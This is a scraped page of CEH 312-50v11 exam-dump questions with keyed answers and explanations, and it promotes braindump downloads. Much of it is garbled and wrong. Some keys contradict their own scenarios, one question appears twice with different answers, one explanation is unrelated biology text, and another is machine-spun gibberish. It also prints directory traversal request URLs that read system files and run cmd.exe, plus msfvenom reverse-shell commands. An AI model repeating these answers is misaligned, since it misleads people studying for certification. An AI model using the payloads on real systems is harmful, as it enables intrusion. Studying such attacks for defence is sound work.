Jan-2022 EC-COUNCIL 312-50v11 Actual Questions and 100% Cover Real Exam Questions [Q146-Q161]

Share

Jan-2022 EC-COUNCIL 312-50v11 Actual Questions and 100% Cover Real Exam Questions

312-50v11 Free Exam Questions & Answers PDF Updated on Jan-2022

NEW QUESTION 146
Don, a student, came across a gaming app in a third-party app store and Installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after Installing the app. What is the attack performed on Don in the above scenario?

  • A. Clickjacking
  • B. SMS phishing attack
  • C. Agent Smith attack
  • D. SIM card attack

Answer: A

Explanation:
Explanation
Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or disguised as another element. this will cause users to unwittingly download malware, visit malicious sites , provide credentials or sensitive information, transfer money, or purchase products online.Typically, clickjacking is performed by displaying an invisible page or HTML element, inside an iframe, on top of the page the user sees. The user believes they're clicking the visible page but actually they're clicking an invisible element within the additional page transposed on top of it.The invisible page might be a malicious page, or a legitimate page the user didn't shall visit - for instance , a page on the user's banking site that authorizes the transfer of cash .There are several variations of the clickjacking attack, such as:* Likejacking - a way during which the Facebook "Like" button is manipulated, causing users to "like" a page they really didn't shall like.* Cursorjacking - a UI redressing technique that changes the cursor for the position the user perceives to a different position. Cursorjacking relies on vulnerabilities in Flash and therefore the Firefox browser, which have now been fixed.
Clickjacking attack example1. The attacker creates a beautiful page which promises to offer the user a free trip to Tahiti.2. within the background the attacker checks if the user is logged into his banking site and if so, loads the screen that permits transfer of funds, using query parameters to insert the attacker's bank details into the shape .3. The bank transfer page is displayed in an invisible iframe above the free gift page, with the "Confirm Transfer" button exactly aligned over the "Receive Gift" button visible to the user.4. The user visits the page and clicks the "Book My Free Trip" button.5. actually the user is clicking on the invisible iframe, and has clicked the "Confirm Transfer" button. Funds are transferred to the attacker.6. The user is redirected to a page with information about the free gift (not knowing what happened within the background).
This example illustrates that, during a clickjacking attack, the malicious action (on the bank website, during this case) can't be traced back to the attacker because the user performed it while being legitimately signed into their own account.
Clickjacking mitigationThere are two general ways to defend against clickjacking:* Client-side methods - the foremost common is named Frame Busting. Client-side methods are often effective in some cases, but are considered to not be a best practice, because they will be easily bypassed.* Server-side methods - the foremost common is X-Frame-Options. Server-side methods are recommended by security experts as an efficient thanks to defend against clickjacking.

 

NEW QUESTION 147
Sam, a professional hacker. targeted an organization with intention of compromising AWS IAM credentials. He attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing emails to steal the AWS 1AM credentials and further compromise the employee's account. What is the technique used by Sam to compromise the AWS IAM credentials?

  • A. Reverse engineering
  • B. Password reuse
  • C. insider threat
  • D. Social engineering

Answer: D

Explanation:
Just like any other service that accepts usernames and passwords for logging in, AWS users are vulnerable to social engineering attacks from attackers. fake emails, calls, or any other method of social engineering, may find yourself with an AWS users' credentials within the hands of an attacker.
If a user only uses API keys for accessing AWS, general phishing techniques could still use to gain access to other accounts or their pc itself, where the attacker may then pull the API keys for aforementioned AWS user.
With basic opensource intelligence (OSINT), it's usually simple to collect a list of workers of an organization that use AWS on a regular basis. This list will then be targeted with spear phishing to do and gather credentials. an easy technique may include an email that says your bill has spiked 500th within the past 24 hours, "click here for additional information", and when they click the link, they're forwarded to a malicious copy of the AWS login page designed to steal their credentials.
An example of such an email will be seen within the screenshot below. it's exactly like an email that AWS would send to you if you were to exceed the free tier limits, except for a few little changes. If you clicked on any of the highlighted regions within the screenshot, you'd not be taken to the official AWS web site and you'd instead be forwarded to a pretend login page setup to steal your credentials.
These emails will get even more specific by playing a touch bit additional OSINT before causing them out. If an attacker was ready to discover your AWS account ID on-line somewhere, they could use methods we at rhino have free previously to enumerate what users and roles exist in your account with none logs contact on your side. they could use this list to more refine their target list, further as their emails to reference services they will know that you often use.
For reference, the journal post for using AWS account IDs for role enumeration will be found here and the journal post for using AWS account IDs for user enumeration will be found here.
During engagements at rhino, we find that phishing is one in all the fastest ways for us to achieve access to an AWS environment.

 

NEW QUESTION 148
John is investigating web-application firewall logs and observers that someone is attempting to inject the following:
char buff[10];
buff[>o] - 'a':
What type of attack is this?

  • A. SQL injection
  • B. XSS
  • C. Buffer overflow
  • D. CSRF

Answer: C

Explanation:
Explanation
Buffer overflow this attack is an anomaly that happens when software writing data to a buffer overflows the buffer's capacity, leading to adjacent memory locations being overwritten. In other words, an excessive amount of information is being passed into a container that doesn't have enough space, which information finishes up replacing data in adjacent containers.Buffer overflows are often exploited by attackers with a goal of modifying a computer's memory so as to undermine or take hold of program execution.

What's a buffer?A buffer, or data buffer, is a neighborhood of physical memory storage wont to temporarily store data while it's being moved from one place to a different . These buffers typically sleep in RAM memory. Computers frequently use buffers to assist improve performance; latest hard drives cash in of buffering to efficiently access data, and lots of online services also use buffers. for instance , buffers are frequently utilized in online video streaming to stop interruption. When a video is streamed, the video player downloads and stores perhaps 20% of the video at a time during a buffer then streams from that buffer. This way, minor drops in connection speed or quick service disruptions won't affect the video stream performance.Buffers are designed to contain specific amounts of knowledge . Unless the program utilizing the buffer has built-in instructions to discard data when an excessive amount of is shipped to the buffer, the program will overwrite data in memory adjacent to the buffer.Buffer overflows are often exploited by attackers to corrupt software. Despite being well-understood, buffer overflow attacks are still a serious security problem that torment cyber-security teams. In 2014 a threat referred to as 'heartbleed' exposed many many users to attack due to a buffer overflow vulnerability in SSL software.
How do attackers exploit buffer overflows?An attacker can deliberately feed a carefully crafted input into a program which will cause the program to undertake and store that input during a buffer that isn't large enough, overwriting portions of memory connected to the buffer space. If the memory layout of the program is well-defined, the attacker can deliberately overwrite areas known to contain executable code. The attacker can then replace this code together with his own executable code, which may drastically change how the program is meant to figure .For example if the overwritten part in memory contains a pointer (an object that points to a different place in memory) the attacker's code could replace that code with another pointer that points to an exploit payload. this will transfer control of the entire program over to theattacker's code.

 

NEW QUESTION 149
Attacker Lauren has gained the credentials of an organization's internal server system, and she was often logging in during irregular times to monitor the network activities. The organization was skeptical about the login times and appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited. What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?

  • A. Incident recording and assignment
  • B. Incident triage
  • C. Eradication
  • D. Preparation

Answer: A

 

NEW QUESTION 150
While testing a web application in development, you notice that the web server does not properly ignore the
"dot dot slash" (../) character string and instead returns the file listing of a folder structure of the server.
What kind of attack is possible in this scenario?

  • A. Denial of service
  • B. SQL injection
  • C. Cross-site scripting
  • D. Directory traversal

Answer: D

Explanation:
Explanation
Appropriately controlling admittance to web content is significant for running a safe web worker. Index crossing or Path Traversal is a HTTP assault which permits aggressors to get to limited catalogs and execute orders outside of the web worker's root registry.
Web workers give two primary degrees of security instruments
* Access Control Lists (ACLs)
* Root index
An Access Control List is utilized in the approval cycle. It is a rundown which the web worker's manager uses to show which clients or gatherings can get to, change or execute specific records on the worker, just as other access rights.
The root registry is a particular index on the worker record framework in which the clients are kept. Clients can't get to anything over this root.
For instance: the default root registry of IIS on Windows is C:\Inetpub\wwwroot and with this arrangement, a client doesn't approach C:\Windows yet approaches C:\Inetpub\wwwroot\news and some other indexes and documents under the root catalog (given that the client is confirmed by means of the ACLs).
The root index keeps clients from getting to any documents on the worker, for example, C:\WINDOWS/system32/win.ini on Windows stages and the/and so on/passwd record on Linux/UNIX stages.
This weakness can exist either in the web worker programming itself or in the web application code.
To play out a registry crossing assault, all an assailant requires is an internet browser and some information on where to aimlessly discover any default documents and registries on the framework.
What an assailant can do if your site is defenselessWith a framework defenseless against index crossing, an aggressor can utilize this weakness to venture out of the root catalog and access different pieces of the record framework. This may enable the assailant to see confined documents, which could give the aggressor more data needed to additional trade off the framework.
Contingent upon how the site access is set up, the aggressor will execute orders by mimicking himself as the client which is related with "the site". Along these lines everything relies upon what the site client has been offered admittance to in the framework.
Illustration of a Directory Traversal assault by means of web application codeIn web applications with dynamic pages, input is generally gotten from programs through GET or POST solicitation techniques. Here is an illustration of a HTTP GET demand URL GET
http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1
Host: test.webarticles.com
With this URL, the browser requests the dynamic page show.asp from the server and with it also sends the parameter view with the value of oldarchive.html. When this request is executed on the web server, show.asp retrieves the file oldarchive.html from the server's file system, renders it and then sends it back to the browser which displays it to the user. The attacker would assume that show.asp can retrieve files from the file system and sends the following custom URL.
GET
http://test.webarticles.com
/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Host: test.webarticles.com
This will cause the dynamic page to retrieve the file system.ini from the file system and display it to the user.
The expression ../ instructs the system to go one directory up which is commonly used as an operating system directive. The attacker has to guess how many directories he has to go up to find the Windows folder on the system, but this is easily done by trial and error.
Example of a Directory Traversal attack via web serverApart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks. The problem can either be incorporated into the web server software or inside some sample script files left available on the server.
The vulnerability has been fixed in the latest versions of web server software, but there are web servers online which are still using older versions of IIS and Apache which might be open to directory traversal attacks. Even though you might be using a web server software version that has fixed this vulnerability, you might still have some sensitive default script directories exposed which are well known to hackers.
For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be GET
http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1 Host: server.com The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command dir c:\ in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character \.
Newer versions of modern web server software check for these escape codes and do not let them through.
Some older versions however, do not filter out these codes in the root directory enforcer and will let the attackers execute such commands.

 

NEW QUESTION 151
A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the Prometric Online Testing - Reports https://ibt1.prometric.com/users/custom/report_queue/rq_str... corporate network. What tool should the analyst use to perform a Blackjacking attack?

  • A. Blooover
  • B. Paros Proxy
  • C. BBCrack
  • D. BBProxy

Answer: D

 

NEW QUESTION 152
Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to. What type of hacker is Nicolas?

  • A. white hat
  • B. Gray hat
    A white hat (or a white hat hacker) is an ethical computer hacker, or a computer security expert, who focuses on penetration testing and in other testing methodologies that ensures the safety of an organization's information systems. Ethical hacking may be a term meant to imply a broader category than simply penetration testing. Contrasted with black hat, a malicious hacker, the name comes from Western films, where heroic and antagonistic cowboys might traditionally wear a white and a black hat respectively. While a white hat hacker hacks under good intentions with permission, and a black hat hacker, most frequently unauthorized, has malicious intent, there's a 3rd kind referred to as a gray hat hacker who hacks with good intentions but sometimes without permission. White hat hackers can also add teams called "sneakers and/or hacker clubs",red teams, or tiger teams. While penetration testing concentrates on attacking software and computer systems from the beginning - scanning ports, examining known defects in protocols and applications running on the system and patch installations, as an example - ethical hacking may include other things. A full-blown ethical hack might include emailing staff to invite password details, searching through executive's dustbins and typically breaking and entering, without the knowledge and consent of the targets. Only the owners, CEOs and Board Members (stake holders) who asked for such a censoring of this magnitude are aware. to undertake to duplicate a number of the destructive techniques a true attack might employ, ethical hackers may arrange for cloned test systems, or organize a hack late in the dark while systems are less critical. In most up-to-date cases these hacks perpetuate for the long-term con (days, if not weeks, of long-term human infiltration into an organization). Some examples include leaving USB/flash key drives with hidden auto-start software during a public area as if someone lost the tiny drive and an unsuspecting employee found it and took it. Some other methods of completing these include: * DoS attacks * Social engineering tactics * Reverse engineering * Network security * Disk and memory forensics * Vulnerability research * Security scanners such as: - W3af - Nessus - Burp suite * Frameworks such as: - Metasploit * Training Platforms These methods identify and exploit known security vulnerabilities and plan to evade security to realize entry into secured areas. they're ready to do that by hiding software and system 'back-doors' which will be used as a link to information or access that a non-ethical hacker, also referred to as 'black-hat' or 'grey-hat', might want to succeed in .
  • C. Black hat
  • D. Red hat

Answer: A

 

NEW QUESTION 153
Which of the following is a command line packet analyzer similar to GUI-based Wireshark?

  • A. jack the ripper
  • B. nessus
  • C. ethereal
  • D. tcpdump

Answer: D

 

NEW QUESTION 154
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced.
Which of the following techniques is described in the above scenario?

  • A. VPN footprinting
  • B. Website footprinting
  • C. VoIP footprinting
  • D. Dark web footprinting

Answer: A

 

NEW QUESTION 155
While browsing his Facebook teed, Matt sees a picture one of his friends posted with the caption. "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate. Matt responds to the questions on the post, a few days later. Mates bank account has been accessed, and the password has been changed. What most likely happened?

  • A. Matt Inadvertently provided his password when responding to the post.
  • B. Matt inadvertently provided the answers to his security questions when responding to the post.
  • C. Matt's computer was infected with a keylogger.
  • D. Matt's bank-account login information was brute forced.

Answer: B

 

NEW QUESTION 156
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

  • A. msfvenom -p windows/rneterpreter/reverse_tcpRMOST=i0.i 0.10.30 LPORT =4444-fc
  • B. msfvenom -p windows/meterpreier/feversetcp LHOST=10.10.10.30 LP0RT=4444-f c
  • C. msfvenom -p wlndows/meterpreter/reverse.tcp lhost=io.i 0.1030 lport=4444 -f exe > shell.exe
  • D. msfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 -f.exe > shell.exe

Answer: D

 

NEW QUESTION 157
Jacob works as a system administrator in an organization. He wants to extract the source code of a mobile application and disassemble the application to analyze its design flaws. Using this technique, he wants to fix any bugs in the application, discover underlying vulnerabilities, and improve defense strategies against attacks.
What is the technique used by Jacob in the above scenario to improve the security of the mobile application?

  • A. App sandboxing
  • B. Reverse engineering
  • C. Jailbreaking
  • D. Social engineering

Answer: B

 

NEW QUESTION 158
An organization is performing a vulnerability assessment tor mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?

  • A. Product-based solutions
  • B. Tree-based assessment
  • C. inference-based assessment
  • D. Service-based solutions

Answer: D

Explanation:
As systems approaches to the event of biological models become more mature, attention is increasingly that specialize in the matter of inferring parameter values within those models from experimental data. However, particularly for nonlinear models, it's not obvious, either from inspection of the model or from the experimental data, that the inverse problem of parameter fitting will have a singular solution, or maybe a non-unique solution that constrains the parameters to lie within a plausible physiological range. Where parameters can't be constrained they're termed 'unidentifiable'. We specialise in gaining insight into the causes of unidentifiability using inference-based methods, and compare a recently developed measure-theoretic approach to inverse sensitivity analysis to the favored Markov chain Monte Carlo and approximate Bayesian computation techniques for Bayesian inference. All three approaches map the uncertainty in quantities of interest within the output space to the probability of sets of parameters within the input space. The geometry of those sets demonstrates how unidentifiability are often caused by parameter compensation and provides an intuitive approach to inference-based experimental design.

 

NEW QUESTION 159
John is investigating web-application firewall logs and observers that someone is attempting to inject the following:
char buff[10];
buff[>o] - 'a':
What type of attack is this?

  • A. XSS
  • B. SQL injection
  • C. Buffer overflow
  • D. CSRF

Answer: B

Explanation:
Explanation
SQL injection may be a web security vulnerability that permits an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to look at data that they're not normally ready to retrieve. This might include data belonging to other users, or the other data that the appliance itself is in a position to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.What is the impact of a successful SQL injection attack?A successful SQL injection attack may result in unauthorized access to sensitive data, like passwords, mastercard details, or personal user information. Many high-profile data breaches in recent years are the results of SQL injection attacks, resulting in reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, resulting in a long-term compromise which will go unnoticed for an extended period.
SQL injection examplesThere are a good sort of SQL injection vulnerabilities, attacks, and techniques, which arise in several situations. Some common SQL injection examples include:* Retrieving hidden data, where you'll modify an SQL query to return additional results.* Subverting application logic, where you'll change a question to interfere with the application's logic.* UNION attacks, where you'll retrieve data from different database tables.* Examining the database, where you'll extract information about the version and structure of the database.* Blind SQL injection, where the results of a question you control aren't returned within the application's responses.

 

NEW QUESTION 160
These hackers have limited or no training and know how to use only basic techniques or tools.
What kind of hackers are we talking about?

  • A. Black-Hat Hackers A
  • B. White-Hat Hackers
  • C. Gray-Hat Hacker
  • D. Script Kiddies

Answer: D

Explanation:
Script Kiddies: These hackers have limited or no training and know how to use only basictechniques or tools. Even then they may not understand any or all of what they are doing.

 

NEW QUESTION 161
......


Audiences that Can Aim at 312-50v11

Think of investing time and efforts in this EC-Council 312-50v11 exam only if your operational areas are linked to penetration testing, vulnerabilities testing, and the like. Also, specialists like auditors, security officers, site administrators, and security employees will earn high profits from such an exam.

 

EC-COUNCIL 312-50v11 Real 2022 Braindumps Mock Exam Dumps: https://www.free4torrent.com/312-50v11-braindumps-torrent.html

Latest 312-50v11 Exam Dumps Recently Updated 525 Questions: https://drive.google.com/open?id=1_VhJ-s-tPszPlVk3GgdupqgL6bP_v6nW